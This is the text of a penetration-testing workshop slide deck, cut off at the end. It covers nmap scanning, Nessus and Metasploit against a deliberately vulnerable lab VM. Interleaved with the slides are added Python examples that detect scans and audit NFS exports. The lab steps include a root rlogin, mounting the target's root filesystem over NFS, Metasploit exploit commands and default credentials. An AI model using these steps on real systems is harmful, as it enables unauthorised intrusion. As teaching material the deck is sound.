Pentesting - Pentest.pdf · •Pentest Lab 1.1 - Setup Vmware/ Virtual Box, Kali Linux VM,...
-
Pentesting: An Introduction
-
Workshop Flow – 1
• Nature of the Cyber Security Problem (Slides 4-7)
• Introduction – Pentesting: what, why, how (8-9)
• Pentesting – Intelligence Gathering (10-11)
• Pentesting tools demo – Kali Linux, NMAP (12)
• Intelligence Gathering using WhoIs (13-15)
• Metasploitable OS – An Introduction (16)
• Pentest Lab 1.1 – Setup VMware/VirtualBox, Kali Linux VM, Metasploitable VM, familiarity with Kali Linux, WhoIs
• Intelligence Gathering using NMAP (18-36)
  • Host Discovery
  • Port Scanning
  • OS Detection
  • Services and Version Detection
• Pentest Lab 1.2 – Intelligence Gathering with NMAP
-
Workshop Flow - 2
• Vulnerability Analysis (38-39)
• Scanning with Nessus (40-42)
• Understanding the Nessus Vulnerability Report (43)
• Understand vulnerabilities: where do they arise from? (44)
• Exploiting Vulnerabilities – Metasploit and Tools (45-54)
  • Rlogin
  • NFS Share
  • Metasploit
• Approach to security – Threat Modelling (55)
• Pentest Lab 1.3
  • Scanning with Nessus, analysing the report
  • Exploit Vulnerability 1, tools
  • Exploit Vulnerability 2, tools
  • Exploit Vulnerabilities 3 and 4 using Metasploit
-
Black Hat – White Hat (A Game)
• Securing Our Home – A perspective
-
Security is a Game of Survival
To survive, the deer should run faster than the tiger
To survive, the tiger should run faster than the deer
-
Physical Security vs Cyber Security
• How similar/different?
  • Intent
• Nature of the problem
  • Internet, global boundaries, glorified hackers, attack tools, standards, underworld economy, accountability, who is the adversary
• Strategy (attack and defense)
  • Weakest-link strategy, all-bases-covered strategy, insider attack, policies at different levels, etc.
• Are they separate any more?
Spyware
Financial Malware
-
Security Problem Solving
• Security: a negative goal.
• Achieve something despite whatever the adversary might do.
• Positive goal: “Ram can read grades.txt”.
  • Ask Ram to check that it works. Easy to check.
• Negative goal: “Shyam cannot read grades.txt”.
  • Check whether Shyam cannot read grades.txt? Good to check, but not nearly enough. Must reason about all possible ways in which Shyam might get the data.
  • How might Shyam try to get the contents of grades.txt? Change permissions, steal the file, impersonate, etc.
• Open-ended problem. No absolute, definitive answer.
• Threat model concept and problem solving
-
Pentesting – What, Why, How
• Pentesting: an attack on a system in the hope of finding security weaknesses
• Rationale: improving the security of your site by breaking into it
• How: using the attacker’s techniques
-
Pentesting – How is it usually done
• Intelligence/ Information Gathering
• Information Analysis and Planning – component relationships, target identification, etc.
• Vulnerability Detection
• Penetration – Developing/ Customising, Choosing Exploit tools
• Attack/Privilege Escalation
• Analysis and reporting
• Clean-up
-
Intelligence Gathering
• What are we looking for?
  • Organizational intelligence, access point discovery, network discovery, infrastructure fingerprinting
• Open Source Intelligence
  • Corporate information: location, org chart, document metadata, network, email addresses, applications used, purchase agreements, defense technologies used (fingerprinting), financial information, etc.
  • Individual information: all about the individual, social engineering
• Covert Intelligence: through individuals
• Footprinting (next slide)
• Identify protection systems (network, host, application, storage, etc.)
-
Intelligence Gathering - Footprinting
• Passive Reconnaissance: whois lookup, BGP looking glasses
• Active Footprinting: port scanning, banner grabbing, SNMP sweeps, DNS discovery, forward/reverse DNS, web application discovery, virtual host detection
• Establish target list: versions, weak web applications, patch level
-
Kali Linux - Demo
A collection of all cyber-security-related tools
Tools for information collection
Some info-gathering tools
Some possibilities: Recon-ng/Harvester, Maltego, NMAP, Burp Suite, Nessus/Acunetix
-
Footprint - First Data
• IP address (some IP address in the network to start with) … hunting for IP addresses
• whois is normally a good place to start … Maltego? … email IDs, mail headers
-
Whois lookup
• Install it on your Linux distro by entering apt-get install whois in a terminal
• https://registry.in/whois/nita.ac.in
• Domain Name: NITA.AC.IN
  Registry Domain ID: D3544155-AFIN
  Registrar WHOIS Server:
  Registrar URL: http://www.ernet.in
  Updated Date: 2017-03-02T07:21:44Z
  Creation Date: 2009-04-06T05:03:46Z
  Registry Expiry Date: 2019-04-06T05:03:46Z
  Registrar Registration Expiration Date:
  Registrar: ERNET India
  Registrar IANA ID: 800068
  Registrar Abuse Contact Email:
  Registrar Abuse Contact Phone:
  Reseller:
  Domain Status: ok
  Registrant Organization: National Institute of Technology, Agartala
  Registrant State/Province:
  Registrant Country: IN
  Name Server: ns1.nkn.in
  Name Server: ns2.nkn.in
  DNSSEC: unsigned
  URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  >>> Last update of WHOIS database: 2018-06-25T15:58:44Z
• http://www.ernet.in/
• https://registry.in/index.php?query=180.149.63.3&output=nice
• https://registry.in/index.php?query=180.149.63.66&output=nice
• https://www.icann.org/wicf
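The whois record above is what a first footprinting step returns; what a defender does with it is watch the expiry date, the DNSSEC state, the name servers and the fields the registry leaves blank. The following Python is an added example (not part of the workshop material) that parses a record in this one-field-per-line format and produces that summary. The sample input is the slide's nita.ac.in record reflowed one field per line; the "as of" date defaults to the record's own "Last update" timestamp so the result is reproducible.

```python
"""Parse a registry whois record (one 'Field: value' per line) and summarize
the items a defender keeps an eye on.  Added example; the sample record is the
slide's nita.ac.in record, reflowed one field per line."""
from datetime import datetime, timezone

WHOIS_TEXT = """\
Domain Name: NITA.AC.IN
Registry Domain ID: D3544155-AFIN
Registrar WHOIS Server:
Registrar URL: http://www.ernet.in
Updated Date: 2017-03-02T07:21:44Z
Creation Date: 2009-04-06T05:03:46Z
Registry Expiry Date: 2019-04-06T05:03:46Z
Registrar Registration Expiration Date:
Registrar: ERNET India
Registrar IANA ID: 800068
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Reseller:
Domain Status: ok
Registrant Organization: National Institute of Technology, Agartala
Registrant State/Province:
Registrant Country: IN
Name Server: ns1.nkn.in
Name Server: ns2.nkn.in
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-06-25T15:58:44Z
"""


def parse_whois(text):
    """Return {field: value}; fields that repeat (Name Server) become lists.
    Empty fields are kept as '' so the caller can see what the registry withholds."""
    record = {}
    for raw in text.splitlines():
        line = raw.strip().lstrip(">").strip()   # drop the '>>>' marker on the last line
        if ":" not in line:
            continue
        key, _, value = line.partition(":")      # split on the FIRST colon only (URLs contain more)
        key, value = key.strip(), value.strip()
        if key in record:                        # repeated field -> list of values
            if not isinstance(record[key], list):
                record[key] = [record[key]]
            record[key].append(value)
        else:
            record[key] = value
    return record


def parse_ts(value):
    """Registry timestamps are ISO-8601 in UTC, e.g. 2019-04-06T05:03:46Z."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def summarize(record, as_of=None):
    """Expiry countdown, DNSSEC state, name servers and the empty fields.
    as_of defaults to the record's own database timestamp; pass
    datetime.now(timezone.utc) for a live check."""
    if as_of is None:
        as_of = parse_ts(record["Last update of WHOIS database"])
    expiry = parse_ts(record["Registry Expiry Date"])
    servers = record.get("Name Server", [])
    if isinstance(servers, str):                 # a single NS would not have become a list
        servers = [servers]
    return {
        "domain": record["Domain Name"],
        "days_to_expiry": (expiry - as_of).days,
        "dnssec_signed": record.get("DNSSEC", "unsigned").lower() != "unsigned",
        "name_servers": servers,
        "empty_fields": sorted(k for k, v in record.items() if v == ""),
    }


if __name__ == "__main__":
    for key, value in summarize(parse_whois(WHOIS_TEXT)).items():
        print(f"{key}: {value}")
```

Run against a live record, the same summary feeds a simple expiry alert (e.g. fewer than 60 days left) and a check that the name servers have not changed since the last lookup.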
-
Whois lookup
• root@kali:~# ping ns1.nkn.in
PING ns1.nkn.in (180.149.63.3) 56(84) bytes of data.
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=1 ttl=56 time=40.3 ms
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=2 ttl=56 time=45.0 ms
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=3 ttl=56 time=46.1 ms
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=4 ttl=56 time=45.3 ms
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=5 ttl=56 time=44.5 ms
--- ns1.nkn.in ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 7715ms
rtt min/avg/max/mdev = 40.333/44.292/46.140/2.048 ms
-
Metasploitable - Introduction
• An intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities.
• Used for Labs to exploit
• This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.
• Created by the Rapid7 Metasploit team
• Metasploitable login is “msfadmin”; the password is also “msfadmin”
-
Lab 1.1
• Lab Setup
  • VirtualBox/VMware
  • Kali Linux, Metasploitable
• Kali Linux Tools
• Metasploitable
• Testing communication between Kali Linux and the Metasploitable server
• Whois
-
NMAP
• nmap is an open-source port/security scanner
• Its primary function is the discovery and mapping of hosts on a network
• nmap is consistently voted one of the most used security tools
• Needs as input a range or some specific address(es)
-
NMAP
• Host Discovery – identifying computers on a network
• Port Scanning – enumerating the open ports on one or more target computers
• Version Detection – interrogating network services listening on remote computers to determine the application name and version number
• OS Detection – remotely determining the operating system of network devices
-
NMAP Demo (Script)
Run the nmap command in the Kali Linux terminal.
Sample syntax:
nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL <inputfilename>: Input from list of hosts/networks
-iR <num hosts>: Choose random targets
--exclude <host1[,host2][,host3],...>: Exclude hosts/networks
--excludefile <exclude_file>: Exclude list from file
Run nmap -v -A against the target, then look at the report nmap_report_1.txt in the Kali Linux reports folder
-
NMAP Host Discovery
• Querying multiple hosts using this method is referred to as a ping sweep: sweep through a range of IP addresses
• The most basic step in mapping out a network.
• Several sweep techniques
  • ARP sweep (default)
  • ICMP sweeps
  • Broadcast ICMP
  • Non-echo ICMP
  • TCP sweep
  • UDP sweep
-
Host Discovery: ARP Sweep – nmap 10.0.2.0/24 -sn
-
Host Discovery: ICMP Sweeps
• Used by nmap when a router is in between (WAN)
• Technique
  • Send an ICMP ECHO request (ICMP type 8)
  • If an ICMP ECHO reply (ICMP type 0) is received: target is alive
  • No response: target is down
• Pros & Cons
  • Easy to implement
  • Fairly slow, easy to block
Diagram: Scanner -> Target: ICMP ECHO request; Target -> Scanner: ICMP ECHO reply => the host is alive. Scanner -> Target: ICMP ECHO request; no response => the host is down/filtered.
-
Host Discovery : TCP Sweeps
• Sending TCP ACK or TCP SYN packets
• The port number can be selected to avoid blocking by the firewall
  • Usually a good pick would be 21 / 22 / 23 / 25 / 80
• But firewalls can spoof a RESET packet for an IP address, so TCP sweeps may not be reliable.
-
Host Discovery : UDP Sweeps
• Relies on the ICMP PORT UNREACHABLE message
• Assume the port is open if no ICMP PORT UNREACHABLE message is received after sending a UDP datagram
• Cons:
  • Routers can drop UDP packets as they cross the Internet
  • Many UDP services do not respond when correctly probed
  • Firewalls are usually configured to drop UDP packets (except for DNS)
• A UDP sweep relies on the fact that a non-active UDP port will respond with an ICMP PORT UNREACHABLE message
-
NMAP Host Discovery summary
• -sL: List Scan – simply list targets to scan
• -sn: Ping Scan – go no further than determining if a host is online
• -Pn: Treat all hosts as online – skip host discovery
• -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports
• -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
• -PO [protocol list]: IP Protocol Ping
• -n/-R: Never do DNS resolution / Always resolve [default: sometimes]
• --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
• --system-dns: Use OS's DNS resolver
• -sU: UDP Scan
Demo, and look at the Wireshark capture:
root@kali:~# nmap -sn 10.0.2.4
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 05:36 EDT
Nmap scan report for 10.0.2.4
Host is up (0.00026s latency).
MAC Address: 08:00:27:1A:23:D5 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
-
Port Scanning: TCP Connect Scan
• Uses the basic TCP connection establishment mechanism; completes the 3-way handshake
• Easy to detect by inspecting the system log
• Normally not used since expensive
Diagram: Scanner -> Target: SYN; Target -> Scanner: SYN/ACK; Scanner -> Target: ACK => the port is open. Scanner -> Target: SYN; Target -> Scanner: RST/ACK => the port is closed.
-
Port Scanning: TCP SYN scan
• Does not establish a complete connection (half-open scanning)
• Send a SYN packet and wait for a response
  • If a SYN/ACK is received => the port is LISTENING
  • Immediately tear down the connection by sending a RESET
  • If an RST/ACK is received => a non-LISTENING port
• nmap -Pn skips host discovery and then runs the default SYN scan against the target’s ports
Diagram: Scanner -> Target: SYN; Target -> Scanner: SYN/ACK; Scanner -> Target: RST => the port is open. Scanner -> Target: SYN; Target -> Scanner: RST/ACK => the port is closed.
-
Port Scanning: Stealth Scan
• To gather information about target sites while avoiding detection
  • Try to hide among normal network traffic
  • Not to be logged by the logging mechanism (stealth)
• Techniques
  • Flag probe packets (also called “inverse mapping”)
    • A response is sent back only by a closed port
    • By determining what services do not exist, an intruder can infer what services do exist
  • Slow scan rate
    • Difficult to detect => need a long history log
CERT reported this technique in CERT® Incident Note IN-98.04
http://www.cert.org/incident_notes/IN-98.04.html
-
Port Scanning: Stealth Mapping
• RFC 793: how to handle packets in the wrong state
  • Closed ports: reply with a RESET packet to wrong-state packets
  • Open ports: ignore any packet in question
• Technique
  • A RST scan
  • A FIN probe with the FIN TCP flag set (e.g. nmap -sF -p25 and capture)
  • An XMAS probe with the FIN, URG, ACK, SYN, RST, PUSH flags set (e.g. nmap -sX -p27)
-
Port Scanning with nmap
• SCAN TECHNIQUES:
  • -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  • -sN/sF/sX: TCP Null, FIN, and Xmas scans
  • -b <FTP relay host>: FTP bounce scan
• PORT SPECIFICATION AND SCAN ORDER:
  • -p <port ranges>: Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
  • -F: Fast mode – Scan fewer ports than the default scan
  • -r: Scan ports consecutively – don't randomize
  • --top-ports <number>: Scan <number> most common ports
  • --port-ratio <ratio>: Scan ports more common than <ratio>
Demo: look at the Wireshark capture of nmap -sP x.x.x.x (uses SYN scan; colorized conversations)
nmap -Pn 10.0.2.4
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 05:14 EDT
Nmap scan report for 10.0.2.4
Host is up (0.00037s latency).
Not shown: 977 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
23/tcp open  telnet
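The host discovery, SYN scan and stealth-mapping slides above describe what each technique puts on the wire; the other side of the same picture is what a perimeter firewall logs and how a defender spots the patterns. The following Python is an added example (not part of the workshop material) that runs three detections over iptables-style LOG lines: a ping sweep (one source sending ICMP echo requests to many hosts), a SYN scan (one source sending bare SYNs to many ports on one host) and the RFC 793 probes from the stealth-mapping slide (Null, FIN-only and Xmas flag combinations, which never occur in legitimate traffic). The log lines are constructed, and the thresholds are assumptions to tune per network.

```python
"""Flag ping sweeps, SYN port scans and stealth (Null/FIN/Xmas) probes in
iptables-style firewall log lines.  Added example; the log lines are
constructed and the thresholds are assumptions."""
import re
from collections import defaultdict

KV = re.compile(r"(\w+)=(\S*)")
TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}


def parse_line(line):
    """Split an iptables LOG line into its KEY=value fields plus the set of
    TCP flag words (iptables prints flags as bare tokens such as 'SYN ACK')."""
    fields = dict(KV.findall(line))
    fields["FLAGS"] = {tok for tok in line.split() if tok in TCP_FLAGS}
    return fields


def detect(lines, sweep_hosts=3, scan_ports=5):
    """Return finding tuples:
       ("ping_sweep", src, distinct_targets)
       ("syn_scan", src, dst, distinct_ports)
       ("stealth_probe", src, dst, dport, kind)   with kind in null / fin / xmas"""
    echo_targets = defaultdict(set)   # src -> hosts it sent ICMP echo requests to
    syn_ports = defaultdict(set)      # (src, dst) -> ports hit with a bare SYN
    stealth = []
    for line in lines:
        p = parse_line(line)
        src, dst, proto = p.get("SRC"), p.get("DST"), p.get("PROTO")
        if proto == "ICMP" and p.get("TYPE") == "8":          # echo request
            echo_targets[src].add(dst)
        elif proto == "TCP":
            flags, dport = p["FLAGS"], p.get("DPT")
            if flags == {"SYN"}:                               # half-open probe or a normal connect
                syn_ports[(src, dst)].add(dport)
            elif not flags:                                    # no flags at all: Null scan
                stealth.append(("stealth_probe", src, dst, dport, "null"))
            elif flags == {"FIN"}:                             # FIN without ACK: FIN scan
                stealth.append(("stealth_probe", src, dst, dport, "fin"))
            elif {"FIN", "PSH", "URG"} <= flags:               # Xmas (the all-flags variant also matches)
                stealth.append(("stealth_probe", src, dst, dport, "xmas"))
    findings = [("ping_sweep", s, len(d)) for s, d in echo_targets.items() if len(d) >= sweep_hosts]
    findings += [("syn_scan", s, d, len(ports)) for (s, d), ports in syn_ports.items()
                 if len(ports) >= scan_ports]
    return findings + stealth


# --- constructed sample log (not a real capture) ---------------------------
def tcp_line(src, dst, dpt, flags):
    return (f"Jun 26 05:14:01 gw kernel: IN=eth0 OUT= SRC={src} DST={dst} LEN=44 TTL=64 "
            f"PROTO=TCP SPT=40001 DPT={dpt} WINDOW=1024 RES=0x00 {flags} URGP=0")


def icmp_line(src, dst):
    return (f"Jun 26 05:36:01 gw kernel: IN=eth0 OUT= SRC={src} DST={dst} LEN=28 TTL=64 "
            f"PROTO=ICMP TYPE=8 CODE=0 ID=1 SEQ=1")


SAMPLE_LOG = (
    [icmp_line("10.0.2.15", f"10.0.2.{i}") for i in (1, 2, 3, 4)]                   # ping sweep
    + [tcp_line("10.0.2.15", "10.0.2.4", p, "SYN") for p in (21, 22, 23, 25, 80, 139)]  # SYN scan
    + [tcp_line("10.0.2.15", "10.0.2.4", 25, "FIN"),                                 # -sF style
       tcp_line("10.0.2.15", "10.0.2.4", 27, "FIN PSH URG"),                         # -sX style
       tcp_line("10.0.2.15", "10.0.2.4", 80, ""),                                    # -sN style
       tcp_line("10.0.2.7", "10.0.2.4", 22, "SYN"),                                  # a normal ssh connect
       tcp_line("10.0.2.4", "10.0.2.7", 40001, "SYN ACK")]                           # ...and its reply
)

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The single SYN from 10.0.2.7 and the SYN/ACK reply produce no finding, which is the point of thresholding on distinct ports: a legitimate client opens one or two ports, a scanner touches dozens. The stealth rules need no threshold at all, since a bare FIN, an empty flag set or FIN+PSH+URG has no legitimate sender.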
-
Services and Versions Detection
• The nmap-service-probes database contains probes for querying various services and match expressions to recognize and parse responses
-
Operating System Detection
• Banner, DNS HINFO and …
• TCP/IP fingerprinting (IP stack implementations respond differently)
  • FIN probe, bogus flag probe
  • TCP initial sequence number sampling, TCP initial window, ACK value
  • ICMP error quenching, message quoting, ICMP echo integrity
  • IP: DF, TOS, fragmentation
-
OS Detection : Examples
• ACK: sending FIN|PSH|URG to a closed port
  • Most OSes: ACK with the same sequence number
  • Windows: ACK with sequence number + 1
• Type of Service: probing with an ICMP_PORT_UNREACHABLE message
  • Most OSes: TOS = 0
  • Linux: TOS = 0xC0
-
Version and OS Detection with nmap
• SERVICE/VERSION DETECTION:
  • -sV: Probe open ports to determine service/version info
  • --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  • --version-light: Limit to most likely probes (intensity 2)
  • --version-all: Try every single probe (intensity 9)
  • --version-trace: Show detailed version scan activity (for debugging)
• OS DETECTION:
  • -O: Enable OS detection
  • --osscan-limit: Limit OS detection to promising targets
  • --osscan-guess: Guess OS more aggressively
Demo: -sV and Wireshark capture
root@kali:~# nmap -sV 10.0.2.4
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 06:01 EDT
Nmap scan report for 10.0.2.4
Host is up (0.00010s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
-
Lab 1.2
• Workshop Lab Document
-
Vulnerabilities
• According to Wikipedia:
“The word vulnerability, in computer security, refers to a weakness in a system allowing an attacker to violate the confidentiality, integrity, availability, access control, consistency or audit mechanisms of the system or the data and applications it hosts”
• To software developers, a bug is synonymous with a vulnerability.
  • Ex: errors in a program’s source code or flawed program design
    • Buffer overflows
    • Memory leaks
    • Deadlocks
    • Arithmetic overflow
    • Accessing protected memory (access violation)
• The software bugs we are speaking of are used as the foundation to form an exploit. A security attack on a vulnerability is an exploit.
-
Vulnerabilities
Using Nmap or any other scanner, have we found any hosts worth attention? The next step should be scanning for exploitable vulnerabilities.
What could be the approach?
• What data do we have so far?
  Hosts, open ports, operating system, applications running, versions
• How could we use this data? Use it to find vulnerabilities using various resources on the net (Exploit DB, the CVE database, other databases)
Or
• Use a vulnerability scanner
-
Vulnerability Scanner - Nessus
• Nessus is a proprietary vulnerability scanner with a free Home version
• Nessus runs a set of exploits against the open ports and reports vulnerabilities
• Vulnerability checks are implemented through plugins.
  • Plugins are written in Nessus Attack Scripting Language (NASL), a scripting language optimized for custom network interaction.
  • New plugins are added as vulnerabilities are discovered.
  • Many plugins check for a vulnerability by actually exploiting the vulnerability.
  • The ‘safe checks’ option specifies that no vulnerability check capable of crashing a remote host be used (such as DoS attacks).
• DEMO … look at the Basic scan and Plugins
-
Vulnerability Scanner - Nessus
• Download Nessus
• On the Kali Linux terminal run /etc/init.d/nessusd start
  You will get “Starting Nessus…”
• Go to https://127.0.0.1:8834/#/
-
Vulnerabilities
Now we know the vulnerabilities.
What’s our goal with this knowledge?
- Understand where vulnerabilities arise from (to prevent them in future)
- Understand how exploitations happen (to be able to write signatures / exploit detection)
Understand the vulnerability categories/families (Nessus families?)
Find a tool to exploit / write an exploit
Metasploit – Rapid7 … Demo
-
Vulnerability – Rlogin Exploit
If we look at the Family column of the Nessus report, we see some simple ones:
- Backdoor
- Gain a shell remotely
- Service Detection – the existence of the service itself indicates a vulnerability. Let’s try to exploit “rlogin Service Detection”
- Click on rlogin Service Detection in the Nessus report to get details
On Kali Linux install rsh-client (for the rlogin command; otherwise it defaults to ssh)
apt-get install rsh-client
rlogin -l root 10.0.2.4
Last login: Thu Jun 28 07:28:57 EDT 2018 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Snip….Snip
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
-
Vulnerability – NFS Share Exploit
- Let’s try to exploit “NFS exported share information disclosure”
- Click on the same in the Nessus report to get details
On Kali Linux install rpcbind (only if you want to recheck whether NFS is running) and nfs-common
apt-get install rpcbind
apt-get install nfs-common
root@kali:~# showmount -e 10.0.2.4
Export list for 10.0.2.4:
/ *
root@kali:~# mkdir /tmp/r00t
root@kali:~# mount -t nfs 10.0.2.4:/ /tmp/r00t/
root@kali:~# ls
amit_passwd Documents Music Pictures Templates Videos
Desktop Downloads 'nmap scan reports' Public trojan.exe
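The showmount output above ("/ *") is the whole finding: the root filesystem is exported to every client. The fix lives in /etc/exports, so the following Python is an added example (not part of the workshop material) of an audit over that file: it parses each path/client pair and flags the settings that turn an export into the situation just demonstrated, namely a wildcard client, an export of "/", a writable export, no_root_squash and insecure. Both exports files are constructed; the weak one is written to match the slide's showmount output and the hardened one shows the corrected form.

```python
"""Audit an /etc/exports file for the settings that make an NFS export
reachable and writable by anyone, next to the hardened form.  Added example;
both files are constructed, the weak one matching the slide's 'showmount -e'
output of '/ *'."""
import re

WEAK_EXPORTS = """\
# constructed: root filesystem exported to every client, writable, root not squashed
/ *(rw,no_root_squash)
"""

HARDENED_EXPORTS = """\
# constructed: one directory, one subnet, read-only, remote root mapped to nobody
/srv/share 10.0.2.0/24(ro,sync,root_squash)
"""

CLIENT = re.compile(r"([^(]+)(?:\((.*)\))?")   # host[(opt,opt,...)]


def parse_exports(text):
    """Return [(path, client, {options})] for every path/client pair in the file.
    A path with no client list is exported to '*' with default options."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # strip comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for client in clients or ["*"]:
            m = CLIENT.fullmatch(client)
            host, opts = m.group(1), m.group(2)
            exports.append((path, host, set(opts.split(",")) if opts else set()))
    return exports


def audit_exports(text):
    """Return (export, problem) pairs; an empty list means nothing was flagged."""
    findings = []
    for path, host, options in parse_exports(text):
        where = f"{path} -> {host}"
        if host == "*" or host.startswith("*."):
            findings.append((where, "wildcard client: any host that can reach the server may mount it"))
        if path == "/":
            findings.append((where, "root filesystem exported: exposes every file on the server"))
        if "rw" in options:
            findings.append((where, "writable export: remote clients can modify files"))
        if "no_root_squash" in options:
            findings.append((where, "no_root_squash: remote root keeps uid 0 on the export"))
        if "insecure" in options:
            findings.append((where, "insecure: mounts accepted from non-privileged source ports"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_EXPORTS), ("hardened", HARDENED_EXPORTS)):
        print(f"[{label}] {len(audit_exports(text))} finding(s)")
        for where, problem in audit_exports(text):
            print(f"  {where}: {problem}")
```

The audit is a static check of the file; showmount -e against the server, as the slide does, confirms what the running daemon actually advertises, and a firewall rule limiting port 2049 and rpcbind to the intended subnet closes the gap even if the file is later edited badly.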
-
Vulnerabilities – Exploit Payload
• Exploits are commonly used to install malware, gain system access, or recruit client machines into an existing ‘botnet’.
• This is accomplished with the help of a payload
• The payload is a sequence of code that is executed when the vulnerability is triggered
• To make things clear, an exploit is really broken into two parts, like so:
EXPLOIT = Vulnerability + Payload
• Different payload types exist and they accomplish different tasks
  • exec → execute a command or program on the remote system
  • download_exec → download a file from a URL and execute it
  • upload_exec → upload a local file and execute it
  • adduser → add a user to the system accounts
-
Metasploit Framework
What is the Metasploit Framework?
• According to the Metasploit Team:
“The Metasploit Framework is a platform for writing, testing, and using
exploit code. The primary users of the Framework are professionals
performing penetration testing, shellcode development, and
vulnerability research.”
-
Metasploit Framework
• The MSF is not only an environment for exploit development but also a platform for launching exploits on real-world applications. It is packaged with real exploits that can do real damage if not used professionally.
• Because MSF is an open-source tool and provides such a simplified method for launching dangerous attacks, it has attracted, and still attracts, black-hat and white-hat beginners. Fairly dangerous.
-
Vulnerabilities – Exploits using Metasploit
db_nmap -v -T4 -PA -sV --version-all --osscan-guess -A -sS -p 1-65535
Scans Metasploitable
-
Vulnerabilities – Exploits using Metasploit
• Run the following command:
services
• Compare with the Nessus report
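Comparing the scanner's view of a host with the Nessus report is the step this slide asks for, and it is easy to do programmatically once both are in a common shape. The following Python is an added example (not part of the workshop material): it parses the nmap -sV output shown earlier for 10.0.2.4 into a service inventory and compares it against a Nessus CSV export, listing ports that only one of the two tools reported. The nmap text is the slide's, reflowed with nmap's column alignment; the Nessus CSV is constructed, using the column names of a Nessus CSV export and the two plugin names the slides click on, with 513 and 2049 being the standard rlogin and NFS ports.

```python
"""Turn an nmap -sV report into a service inventory and compare it with a
Nessus CSV export.  Added example; the nmap text is the slide's output for
10.0.2.4, the Nessus CSV is constructed."""
import csv
import io
import re

NMAP_OUTPUT = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 06:01 EDT
Nmap scan report for 10.0.2.4
Host is up (0.00010s latency).
Not shown: 977 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open  telnet
"""

# Constructed Nessus-style export (column names as in a Nessus CSV export).
NESSUS_CSV = """\
Host,Protocol,Port,Name
10.0.2.4,tcp,21,FTP Server Detection
10.0.2.4,tcp,22,SSH Server Type and Version Information
10.0.2.4,tcp,513,rlogin Service Detection
10.0.2.4,tcp,2049,NFS Exported Share Information Disclosure
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text):
    """Return {host: {(port, proto): (service, version)}} for open ports only."""
    inventory, host = {}, None
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            host = line.split()[-1].strip("()")      # last token is the address
            inventory[host] = {}
            continue
        m = PORT_LINE.match(line)
        if m and host and m.group(3) == "open":
            port, proto, _, service, version = m.groups()
            inventory[host][(int(port), proto)] = (service, (version or "").strip())
    return inventory


def parse_nessus_csv(text):
    """Return {(host, port, proto): [plugin names]} from a Nessus CSV export."""
    findings = {}
    for row in csv.DictReader(io.StringIO(text)):
        key = (row["Host"], int(row["Port"]), row["Protocol"].lower())
        findings.setdefault(key, []).append(row["Name"])
    return findings


def compare(nmap_inventory, nessus_findings):
    """Ports each tool saw that the other did not, plus the overlap."""
    nmap_keys = {(h, port, proto) for h, ports in nmap_inventory.items() for port, proto in ports}
    nessus_keys = set(nessus_findings)
    return {"only_nmap": nmap_keys - nessus_keys,
            "only_nessus": nessus_keys - nmap_keys,
            "both": nmap_keys & nessus_keys}


if __name__ == "__main__":
    diff = compare(parse_nmap(NMAP_OUTPUT), parse_nessus_csv(NESSUS_CSV))
    for bucket, keys in diff.items():
        print(bucket, sorted(keys))
```

A port in only_nessus means the nmap run (or the excerpt kept from it) missed a listener, and a port in only_nmap means Nessus had no plugin fire on it; either list is the first thing to follow up before reading the report further.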
-
Vulnerabilities – Exploits using Metasploit
Usually the sequence for exploiting is:
- Search for the exploit/payload using the command “search xxx”. The search can be on multiple keywords related to the vulnerability, e.g. CVE, module, etc.
- “use <module name>”
- “info” to get information on the exploit
- “run” to execute the exploit
-
Vulnerabilities – UnrealIRCd Backdoor Detection
- Click on UnrealIRCd Backdoor Detection in the Nessus report
  Provides information including the CVE number, CVE-2010-2075
- In Metasploit, ‘search CVE-2010-2075’ gives:
